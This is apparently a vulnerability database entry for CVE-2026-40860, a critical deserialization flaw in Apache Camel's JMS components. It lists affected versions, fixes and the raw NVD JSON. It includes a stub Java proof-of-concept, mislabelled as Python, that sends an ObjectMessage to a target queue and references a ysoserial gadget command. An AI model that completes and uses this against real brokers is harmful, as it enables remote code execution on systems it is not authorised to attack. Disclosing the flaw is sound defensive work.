CVE-2026-40860

Description

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6. This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:apache:camel:4.19.0:*:*:*:*:*:*:* - VULNERABLE

Apache Camel >= 3.0.0, < 4.14.7

Apache Camel >= 4.15.0, < 4.18.2

Apache Camel >= 4.19.0, < 4.20.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Java Conceptual PoC for CVE-2026-40860
// Demonstrates sending a malicious ObjectMessage to trigger deserialization in Apache Camel

import javax.jms.*;
import org.apache.activemq.ActiveMQConnectionFactory;

public class CamelDeserializationPoc {
    public static void main(String[] args) {
        try {
            // 1. Establish connection to the JMS Broker
            ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://target-jms-broker:61616");
            Connection connection = connectionFactory.createConnection();
            Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);

            // 2. Define the target queue or topic consumed by Camel
            Destination destination = session.createQueue("VULNERABLE_QUEUE");
            MessageProducer producer = session.createProducer(destination);

            // 3. Generate a malicious payload object using a gadget chain (e.g., via ysoserial)
            // Object payload = SerializeUtil.generate("CommonsCollections5", "touch /tmp/pwned");
            Object maliciousPayload = getExploitObject();

            // 4. Wrap the payload in an ObjectMessage
            ObjectMessage message = session.createObjectMessage();
            message.setObject(maliciousPayload);

            // 5. Send the message. Camel's JmsBinding will deserialize it automatically.
            producer.send(message);
            System.out.println("[+] Malicious ObjectMessage sent successfully.");

            connection.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // Helper to simulate payload generation
    private static Object getExploitObject() {
        // In a real attack, return a serialized object from a gadget chain
        return "ExploitGadgetObject";
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40860
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40860
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40860/
[4] VulDB https://vuldb.com/cve/CVE-2026-40860
[5] https://camel.apache.org/security/CVE-2026-40860.html
[6] http://www.openwall.com/lists/oss-security/2026/04/26/10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40860", "sourceIdentifier": "[email protected]", "published": "2026-04-27T09:16:01.770", "lastModified": "2026-04-28T19:42:46.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6.\n\nThis issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.\n\nUsers are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "4.14.7", "matchCriteriaId": "9A9BE1D5-B34C-4683-86D0-AC655FE1B068"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15.0", "versionEndExcluding": "4.18.2", "matchCriteriaId": "806A2561-97E3-42A3-931D-A9040BB96CE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:4.19.0:*:*:*:*:*:*:*", "matchCriteriaId": "EDA4D206-8808-4D2A-873E-8488DD7E3E16"}]}]}], "references": [{"url": "https://camel.apache.org/security/CVE-2026-40860.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/26/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}